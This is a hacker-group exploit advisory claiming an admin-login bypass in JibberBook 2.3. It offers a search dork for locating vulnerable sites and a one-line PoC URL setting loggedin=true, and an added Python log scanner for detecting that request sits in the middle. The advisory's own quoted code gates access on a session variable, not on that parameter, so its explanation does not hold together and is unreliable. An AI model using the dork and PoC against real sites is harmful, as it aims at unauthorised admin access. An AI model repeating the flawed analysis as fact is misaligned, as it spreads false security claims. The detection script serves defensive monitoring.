Jibberbook version 2.3 suffers from an administrative bypass vulnerability.
#################################################
# Exploit Title : JibberBook Admin Bypass Vulnerability
#
# Author : IrIsT.Ir & Sec4Ever.com
#
# Discovered By : L3b-r1'z
#
# Home : http://IrIsT.Ir & http://Sec4Ever.com
#
# Blog : http://L3b-r1z.com/
#
# Software Link : http://jibberbook.com/
#
# Security Risk : High
#
# Version : 2.3
#
# Tested on : Windows XP
#
# Dork : allintext: "JibberBook created by chromasynthetic | Powered by MooTools, HTML Purifier, and Akismet"
#
# 1) Script
# 2) Vulnerability Info
# 3) PoC
#
#
#################################################
#
# 1) Script:
# JibberBook lets visitors leave a comment, such as how much they like the
# website :), or any other message for the site admin.
#
#
#################################################
#
# 2) Vulnerability Info :
# This exploit allows an attacker to log into the admin panel without entering a
# username or password.
# Look at the file index.php in jibberbook-2.3\admin :
#
# require_once('inc/secure.php');
# require_once('../inc/includes.php');
# includes(array('admin/actions/load.php', 'admin/actions/transformxml.php'));
#
# $_SESSION['referer'] = 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
# require_once('inc/header.php');
# ?>
# index.php requires a file named secure.php, so let's check that one :) :
#
# session_start();
# if (!isset($_SESSION['admin']))
# {
#     if (is_file(realpath('login_form.php'))) {
#         $url = 'http://' . $_SERVER['HTTP_HOST'] . dirname($_SERVER['REQUEST_URI'] . 'x') . '/login_form.php';
#     } else {
#         $url = 'http://' . $_SERVER['HTTP_HOST'] . dirname(dirname($_SERVER['REQUEST_URI'] . 'x')) . '/login_form.php';
#     }
#     header("Location: $url");
#     exit();
# } else {
#     $loggedin = true;
# }
#
# This file does not really secure anything :P.
# Look at the code above: the whole check ends in "else $loggedin = true". That means
# a visitor who is not the admin (no 'admin' entry in the session) is sent to
# login_form.php, otherwise $loggedin is set to true and the admin goes through to
# the admin panel :).
#
#
#################################################
#
# 3) PoC :
#
# Site.Com/Admin/Login_form.php?loggedin=true
#
#################################################
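# Added example (editor's code, not part of the original advisory or of JibberBook): a
# Python check that scans web server access logs for the request pattern used in the
# PoC above, i.e. any request under /admin/ whose query string carries a 'loggedin'
# parameter, matched case-insensitively because the PoC path and parameter are
# mixed-case and the tested platform is Windows. The log lines are constructed samples.

```python
"""Flag JibberBook admin-bypass attempts (/admin/...?loggedin=...) in access logs."""
import re
from urllib.parse import parse_qs, urlsplit

# Apache/nginx "combined" log format; only the fields we need are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    # keep_blank_values so '?loggedin=' (empty value) is still seen as the parameter
    rec["query"] = parse_qs(parts.query, keep_blank_values=True)
    return rec

def find_bypass_attempts(lines):
    """Return (ip, time, target) for every request under /admin/ whose query string
    sets a 'loggedin' parameter. Path and parameter name are compared case-insensitively:
    the PoC uses Admin/Login_form.php and the advisory's test platform is Windows."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None or "/admin/" not in rec["path"].lower():
            continue
        if any(name.lower() == "loggedin" for name in rec["query"]):
            hits.append((rec["ip"], rec["time"], rec["target"]))
    return hits

# Constructed sample lines (RFC 5737 documentation addresses), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2012:13:55:36 +0000] "GET /Admin/Login_form.php?loggedin=true HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [10/Oct/2012:13:56:01 +0000] "GET /admin/login_form.php HTTP/1.1" 200 1043 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Oct/2012:13:56:20 +0000] "GET /admin/index.php?LoggedIn=1 HTTP/1.1" 302 0 "-" "curl/7.26.0"',
    '192.0.2.9 - - [10/Oct/2012:13:57:00 +0000] "GET /index.php?loggedin=true HTTP/1.1" 200 2001 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, when, target in find_bypass_attempts(SAMPLE_LOG):
        print(f"{when} {ip} {target}")
```

Only the two requests that set a loggedin parameter under /admin/ are reported; the plain visit to login_form.php and the non-admin request with the same parameter are not.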
#
#
# Special Thx To : Irist Team & Sec4Ever Team .
#
#################################################
#
#
# Greet'z : b0x, Virus-Ra3ch, Damane2011, Hacker-1420, The Injector, N4ss1m, hacker-1420.
# Sec4ever, B07 M4S73R, Stalk3r, Hacker-Dz, Mr.XKILLeR, The Viper, Th3 Killer Dz.
# Over-X <3, And All My Friends.
#
#################################################
--
Proud To Be Lebanese :D
I Will Miss You My Friends : b0x, Virus-Ra3ch, Damane2011, Hacker-1420, The
Injector, N4ss1m, Sec4ever, B07 M4S73R, Stalk3r, Hacker-Dz, Mr.XKILLeR, The
Viper, Th3 Killer Dz, Over-X <3, And All My Friends.
Sec4ever.com.